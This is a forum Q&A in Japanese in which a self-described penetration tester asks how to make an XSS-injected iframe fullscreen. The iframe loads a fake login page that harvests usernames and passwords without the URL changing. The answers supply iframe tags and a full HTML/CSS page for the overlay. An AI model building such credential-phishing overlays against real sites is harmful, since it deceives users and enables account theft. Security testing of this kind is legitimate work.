フルスクリーンiframeを作成する
現在、クライアントデモンストレーションで使用することを目的に、XSS攻撃を検討しています(ペンテスター)。 Webサイトのログインページの悪意のあるバージョンをホストし(ユーザー名とパスワードを収集する)、被害者を元のWebサイトにリダイレクトするツールを作成しました。ただし、URLが変更されないため、はるかに説得力があるように見えるので、代わりにiframeを使用して動作するようにしようとしています。
私はグーグルで調べましたが、これは適切なコードのようです:
<iframe src="http://192.168.0.1/login.php" style="border: 0; width: 100%; height: 100%">
作成されたiframeは決してフルスクリーンではありません(Internet ExplorerおよびFirefoxで)。これがスクリーンショットです
ご覧のとおり、iframeログインページは「あなたの名前は何ですか?」の下にあります。そのため、フルスクリーンに近い場所はありません。悪意のあるログインページのcssファイルを編集して、全画面パラメーターを含めることを試みましたが、これも効果がありません。
誰にも解決策はありますか?ありがとう!
テストされていませんが、これを試してください:
<iframe src="http://192.168.0.1/login.php" style="border: 0; position:absolute; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
または
<iframe src="http://192.168.0.1/login.php" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
このコードは機能します:
<html>
<head>
<style type="text/css">
body
{
margin: 0;
overflow: hidden;
}
#iframe1
{
height: 100%;
left: 0px;
position: absolute;
top: 0px;
width: 100%;
}
</style>
</head>
<body>
<iframe id="iframe1" src="HERE PLACE YOUR URL" frameborder="0"></iframe>
</body>
</html>